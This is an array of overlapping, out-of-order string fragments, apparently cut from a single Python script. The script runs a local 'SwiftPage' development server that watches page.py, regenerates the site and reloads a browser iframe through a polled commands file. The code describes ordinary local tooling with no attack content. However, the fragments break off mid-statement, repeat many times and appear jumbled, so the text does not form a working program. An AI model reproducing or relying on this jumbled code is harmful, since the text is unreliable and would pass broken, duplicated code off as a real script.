"//iframe.location.reload(true); } } } } else { console.log('Commands file does not exist.'); }", "exist.'); } }); } function checkForCommands() { var filename = '.swiftpage_commands'; loadCommands(filename); }", "= open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self,", "(lastRefreshToken !== lines[i]) { lastRefreshToken = lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src =", "commands.close() else: # empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop():", "last_modified_time != modified_time: last_modified_time = modified_time os.system('python create_page.py') print(\"Page modified, new SwiftPage generated:", "regenerated when changes are made\") # starts loops t1.start() t2.start() # serves html", "from page import * import http.server import socketserver last_modified_time = 0 dev_page_prefix =", "{ var filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body style='padding: 0px;", "style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe> </body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix", "''')|$)/gm) for (var i = 0; i < lines.length; i++) { //console.log(lines[i]); //", "function checkForCommands() { var filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body", "last_modified_time = 0 dev_page_prefix = ''' <html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script>", "</script> <body style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%;", "port = 8080 handler = customHandler # 
http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 =", "<script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\"; function loadCommands(filename) { $.get(filename, function(data, textStatus)", "return # starts web server port = 8080 handler = customHandler # http.server.SimpleHTTPRequestHandler", "web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running, your site", "necessary, saves new copy of swiftpage if last_modified_time != modified_time: last_modified_time = modified_time", "= open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close()", "threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as httpd: # opens web", "handler) as httpd: # opens web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True)", "handler = customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\",", "starts web server port = 8080 handler = customHandler # http.server.SimpleHTTPRequestHandler t1 =", "custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): return # starts web", "import webbrowser import threading from addons.addons_server import * from page import * import", "var lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var i", "\"+str(last_modified_time)) # refreshes web browser and writes other commands commands = open(\".swiftpage_commands\",\"w\") 
commands.write(str(last_modified_time))", "file does not exist.'); } }); } function checkForCommands() { var filename =", "updated modified_time = os.path.getmtime(\"page.py\") # if necessary, saves new copy of swiftpage if", "your site will now be automatically regenerated when changes are made\") # starts", "not exist.'); } }); } function checkForCommands() { var filename = '.swiftpage_commands'; loadCommands(filename);", "changes are made\") # starts loops t1.start() t2.start() # serves html server httpd.serve_forever()", "iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } } else { console.log('Commands file does not", "//console.log(lines[i]); // TODO: remove if (lines[i] !== '' && lines[i] !== ' ')", "from addons.addons_server import * from page import * import http.server import socketserver last_modified_time", "see if files have been updated modified_time = os.path.getmtime(\"page.py\") # if necessary, saves", "t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as httpd: # opens web browser", "True: global last_modified_time # checks to see if files have been updated modified_time", "os.system('python create_page.py') print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time)) # refreshes web browser and", "= \"none\"; function loadCommands(filename) { $.get(filename, function(data, textStatus) { if (textStatus == 'success')", "web server port = 8080 handler = customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop)", "Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\"; function loadCommands(filename) { $.get(filename,", "modified, new SwiftPage generated: \"+str(last_modified_time)) # refreshes web browser and writes other commands", "print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time)) # 
refreshes web browser and writes other", "'' && lines[i] !== ' ') { if (lastRefreshToken !== lines[i]) { lastRefreshToken", "swiftpage if last_modified_time != modified_time: last_modified_time = modified_time os.system('python create_page.py') print(\"Page modified, new", "lines.length; i++) { //console.log(lines[i]); // TODO: remove if (lines[i] !== '' && lines[i]", "'\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var i = 0; i < lines.length; i++)", "new copy of swiftpage if last_modified_time != modified_time: last_modified_time = modified_time os.system('python create_page.py')", "*args): return # starts web server port = 8080 handler = customHandler #", "} } } } else { console.log('Commands file does not exist.'); } });", "dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop(): while True: global last_modified_time # checks to", "checks to see if files have been updated modified_time = os.path.getmtime(\"page.py\") # if", "be automatically regenerated when changes are made\") # starts loops t1.start() t2.start() #", "height: 100%; outline: none;' frameborder='0'></iframe> </body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server =", "dev_page_suffix = ''')|$)/gm) for (var i = 0; i < lines.length; i++) {", "opens web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running, your", "loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window'", "= ''' <html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\";", "webbrowser import threading from addons.addons_server import * from page import * import http.server", "import * import http.server 
import socketserver last_modified_time = 0 dev_page_prefix = ''' <html>", "{ if (textStatus == 'success') { var lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r'", "{ lastRefreshToken = lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true);", "!== '' && lines[i] !== ' ') { if (lastRefreshToken !== lines[i]) {", "lines[i]) { lastRefreshToken = lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true);", "HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): return # starts web server", "time import webbrowser import threading from addons.addons_server import * from page import *", "commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\")", "commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update() #", "100%; outline: none;' frameborder='0'></iframe> </body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page)", "modified_time = os.path.getmtime(\"page.py\") # if necessary, saves new copy of swiftpage if last_modified_time", "= iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } } else { console.log('Commands file does", "commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties commands commands = open(\".swiftpage_commands\",\"w\")", "os.path.getmtime(\"page.py\") # if necessary, saves new copy of swiftpage if last_modified_time != modified_time:", 
"addons_loop(): global addons_server addons_server.on_update() # removes existing commands file os.remove(\".swiftpage_commands\") # creates dev_server.html", "customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): return # starts web server port = 8080", "}); } function checkForCommands() { var filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30);", "t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as httpd: #", "} } else { console.log('Commands file does not exist.'); } }); } function", "= AddonsServer(page) def main_loop(): while True: global last_modified_time # checks to see if", "server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running, your site will now be automatically", "writes other commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties commands commands", "page import * import http.server import socketserver last_modified_time = 0 dev_page_prefix = '''", "# starts web server port = 8080 handler = customHandler # http.server.SimpleHTTPRequestHandler t1", "* from page import * import http.server import socketserver last_modified_time = 0 dev_page_prefix", "= threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as httpd: # opens web browser of", "* import http.server import socketserver last_modified_time = 0 dev_page_prefix = ''' <html> <title>SwiftPage", "dev_page_prefix = ''' <html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken =", "dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var i = 0; i <", "var iframe = 
document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } }", "addons_server = AddonsServer(page) def main_loop(): while True: global last_modified_time # checks to see", "= document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } } else {", "main_loop(): while True: global last_modified_time # checks to see if files have been", "dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop(): while True: global last_modified_time #", "document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } } else { console.log('Commands", "{ var lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var", "!= modified_time: last_modified_time = modified_time os.system('python create_page.py') print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time))", "dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler):", "now be automatically regenerated when changes are made\") # starts loops t1.start() t2.start()", "# if necessary, saves new copy of swiftpage if last_modified_time != modified_time: last_modified_time", "if (lines[i] !== '' && lines[i] !== ' ') { if (lastRefreshToken !==", "function loadCommands(filename) { $.get(filename, function(data, textStatus) { if (textStatus == 'success') { var", "lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var i =", "&& lines[i] !== ' ') { if (lastRefreshToken !== lines[i]) { 
lastRefreshToken =", "= os.path.getmtime(\"page.py\") # if necessary, saves new copy of swiftpage if last_modified_time !=", "'.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html'", "# checks to see if files have been updated modified_time = os.path.getmtime(\"page.py\") #", "os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP", "# refreshes web browser and writes other commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close()", "socketserver last_modified_time = 0 dev_page_prefix = ''' <html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script>", "i < lines.length; i++) { //console.log(lines[i]); // TODO: remove if (lines[i] !== ''", "commands file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines", "<iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe> </body> </html> '''", "commands.write(str(last_modified_time)) commands.close() else: # empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def", "handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): return # starts web server port", "<script> var lastRefreshToken = \"none\"; function loadCommands(filename) { $.get(filename, function(data, textStatus) { if", "= modified_time os.system('python create_page.py') print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time)) # refreshes web", "} function 
checkForCommands() { var filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script>", "defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): return # starts", "# http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as", "will now be automatically regenerated when changes are made\") # starts loops t1.start()", "import * from page import * import http.server import socketserver last_modified_time = 0", "var filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body style='padding: 0px; margin:", "while True: global last_modified_time # checks to see if files have been updated", "socketserver.TCPServer((\"\", port), handler) as httpd: # opens web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html',", "http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as httpd:", "modified_time os.system('python create_page.py') print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time)) # refreshes web browser", "port), handler) as httpd: # opens web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0,", "addons.addons_server import * from page import * import http.server import socketserver last_modified_time =", "function(data, textStatus) { if (textStatus == 'success') { var lines = data.match(/^.*((''' dev_page_middle", "server running, your site will now be automatically regenerated when changes are made\")", "open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") 
commands.close() time.sleep(0.6)", "threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as httpd: # opens web browser of local", "= data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var i = 0;", "= '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body style='padding: 0px; margin: 0px;'> <iframe", "have been updated modified_time = os.path.getmtime(\"page.py\") # if necessary, saves new copy of", "browser and writes other commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties", "log_message(self, format, *args): return # starts web server port = 8080 handler =", "if necessary, saves new copy of swiftpage if last_modified_time != modified_time: last_modified_time =", "files have been updated modified_time = os.path.getmtime(\"page.py\") # if necessary, saves new copy", "open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update() # removes existing commands", "running, your site will now be automatically regenerated when changes are made\") #", "textStatus) { if (textStatus == 'success') { var lines = data.match(/^.*((''' dev_page_middle =", "src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\"; function loadCommands(filename) { $.get(filename, function(data, textStatus) {", "' ') { if (lastRefreshToken !== lines[i]) { lastRefreshToken = lines[i]; var iframe", "= open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update() # removes existing", "format, *args): return # starts web server port = 8080 handler = customHandler", "class customHandler(http.server.SimpleHTTPRequestHandler): 
def log_message(self, format, *args): return # starts web server port =", "name='content_window' style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe> </body> </html> ''' dev_page =", "} } } else { console.log('Commands file does not exist.'); } }); }", "generated: \"+str(last_modified_time)) # refreshes web browser and writes other commands commands = open(\".swiftpage_commands\",\"w\")", "def log_message(self, format, *args): return # starts web server port = 8080 handler", "httpd: # opens web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server", "file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom", "data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var i = 0; i", "time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update() # removes existing commands file os.remove(\".swiftpage_commands\") #", "if (textStatus == 'success') { var lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix", "AddonsServer(page) def main_loop(): while True: global last_modified_time # checks to see if files", "= 8080 handler = customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop)", "<body style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline:", "</body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop(): while True:", "import threading from addons.addons_server import * from page import * import http.server import", "if (lastRefreshToken !== lines[i]) { lastRefreshToken = 
lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src", "print(\"SwiftPage server running, your site will now be automatically regenerated when changes are", "{ //console.log(lines[i]); // TODO: remove if (lines[i] !== '' && lines[i] !== '", "0 dev_page_prefix = ''' <html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken", "0; i < lines.length; i++) { //console.log(lines[i]); // TODO: remove if (lines[i] !==", "global addons_server addons_server.on_update() # removes existing commands file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page", "global last_modified_time # checks to see if files have been updated modified_time =", "lastRefreshToken = \"none\"; function loadCommands(filename) { $.get(filename, function(data, textStatus) { if (textStatus ==", "automatically regenerated when changes are made\") # starts loops t1.start() t2.start() # serves", "< lines.length; i++) { //console.log(lines[i]); // TODO: remove if (lines[i] !== '' &&", "def main_loop(): while True: global last_modified_time # checks to see if files have", "to see if files have been updated modified_time = os.path.getmtime(\"page.py\") # if necessary,", "loadCommands(filename) { $.get(filename, function(data, textStatus) { if (textStatus == 'success') { var lines", "TODO: remove if (lines[i] !== '' && lines[i] !== ' ') { if", "if last_modified_time != modified_time: last_modified_time = modified_time os.system('python create_page.py') print(\"Page modified, new SwiftPage", "$.get(filename, function(data, textStatus) { if (textStatus == 'success') { var lines = data.match(/^.*(('''", "</html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop(): while True: global", "def addons_loop(): global addons_server addons_server.on_update() # removes existing commands file 
os.remove(\".swiftpage_commands\") # creates", "i = 0; i < lines.length; i++) { //console.log(lines[i]); // TODO: remove if", "8080 handler = customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with", "style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline: none;'", "0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe>", "src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe> </body> </html> ''' dev_page", "i++) { //console.log(lines[i]); // TODO: remove if (lines[i] !== '' && lines[i] !==", "checkForCommands() { var filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body style='padding:", "http.server import socketserver last_modified_time = 0 dev_page_prefix = ''' <html> <title>SwiftPage Development Server</title>", "if files have been updated modified_time = os.path.getmtime(\"page.py\") # if necessary, saves new", "== 'success') { var lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm)", "# opens web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running,", "import http.server import socketserver last_modified_time = 0 dev_page_prefix = ''' <html> <title>SwiftPage Development", "') { if (lastRefreshToken !== lines[i]) { lastRefreshToken = lines[i]; var iframe =", "server port = 8080 handler = customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2", "= ''')|$)/gm) for (var i = 0; i < lines.length; i++) { //console.log(lines[i]);", "(textStatus == 'success') { var lines = data.match(/^.*((''' 
dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix =", "threading from addons.addons_server import * from page import * import http.server import socketserver", "!== ' ') { if (lastRefreshToken !== lines[i]) { lastRefreshToken = lines[i]; var", "import time import webbrowser import threading from addons.addons_server import * from page import", "= dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop(): while True: global last_modified_time # checks", "<html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\"; function loadCommands(filename)", "open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format,", "new=0, autoraise=True) print(\"SwiftPage server running, your site will now be automatically regenerated when", "= 0 dev_page_prefix = ''' <html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var", "remove if (lines[i] !== '' && lines[i] !== ' ') { if (lastRefreshToken", "} setInterval(checkForCommands, 30); </script> <body style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width:", "none;' frameborder='0'></iframe> </body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop():", "import socketserver last_modified_time = 0 dev_page_prefix = ''' <html> <title>SwiftPage Development Server</title> <script", "saves new copy of swiftpage if last_modified_time != modified_time: last_modified_time = modified_time os.system('python", "and writes other commands commands = open(\".swiftpage_commands\",\"w\") 
commands.write(str(last_modified_time)) commands.close() else: # empties commands", "addons_server.on_update() # removes existing commands file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\")", "= threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as httpd: # opens", "# creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP handler", "site will now be automatically regenerated when changes are made\") # starts loops", "commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update() # removes existing commands file", "does not exist.'); } }); } function checkForCommands() { var filename = '.swiftpage_commands';", "Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\"; function loadCommands(filename) { $.get(filename, function(data,", "} }); } function checkForCommands() { var filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands,", "commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update() # removes", "= 0; i < lines.length; i++) { //console.log(lines[i]); // TODO: remove if (lines[i]", "<title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\"; function loadCommands(filename) {", "iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } } else", "os import time import webbrowser import threading from addons.addons_server import 
* from page", "filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body style='padding: 0px; margin: 0px;'>", "modified_time: last_modified_time = modified_time os.system('python create_page.py') print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time)) #", "commands.close() time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update() # removes existing commands file os.remove(\".swiftpage_commands\")", "outline: none;' frameborder='0'></iframe> </body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def", "browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running, your site will", "# empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global addons_server", "// TODO: remove if (lines[i] !== '' && lines[i] !== ' ') {", "{ $.get(filename, function(data, textStatus) { if (textStatus == 'success') { var lines =", "existing commands file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() #", "frameborder='0'></iframe> </body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop(): while", "when changes are made\") # starts loops t1.start() t2.start() # serves html server", "''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop(): while True: global last_modified_time", "last_modified_time # checks to see if files have been updated modified_time = os.path.getmtime(\"page.py\")", "dev_server_page.close() # defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, 
*args): return", "(lines[i] !== '' && lines[i] !== ' ') { if (lastRefreshToken !== lines[i])", "lines[i] !== ' ') { if (lastRefreshToken !== lines[i]) { lastRefreshToken = lines[i];", "with socketserver.TCPServer((\"\", port), handler) as httpd: # opens web browser of local server", "100%; height: 100%; outline: none;' frameborder='0'></iframe> </body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server", "var lastRefreshToken = \"none\"; function loadCommands(filename) { $.get(filename, function(data, textStatus) { if (textStatus", "console.log('Commands file does not exist.'); } }); } function checkForCommands() { var filename", "''' <html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\"; function", "copy of swiftpage if last_modified_time != modified_time: last_modified_time = modified_time os.system('python create_page.py') print(\"Page", "create_page.py') print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time)) # refreshes web browser and writes", "= lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } }", "iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } } else { console.log('Commands file does not exist.');", "for (var i = 0; i < lines.length; i++) { //console.log(lines[i]); // TODO:", "30); </script> <body style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%; height:", "of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running, your site will now", "} else { console.log('Commands file does not exist.'); } }); } function checkForCommands()", "dev_server_page = open(\"dev_server.html\",\"w\") 
dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def", "= '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var i = 0; i < lines.length;", "lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } }", "else { console.log('Commands file does not exist.'); } }); } function checkForCommands() {", "else: # empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global", "removes existing commands file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close()", "0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe> </body> </html>", "setInterval(checkForCommands, 30); </script> <body style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%;", "been updated modified_time = os.path.getmtime(\"page.py\") # if necessary, saves new copy of swiftpage", "of swiftpage if last_modified_time != modified_time: last_modified_time = modified_time os.system('python create_page.py') print(\"Page modified,", "refreshes web browser and writes other commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else:" ]
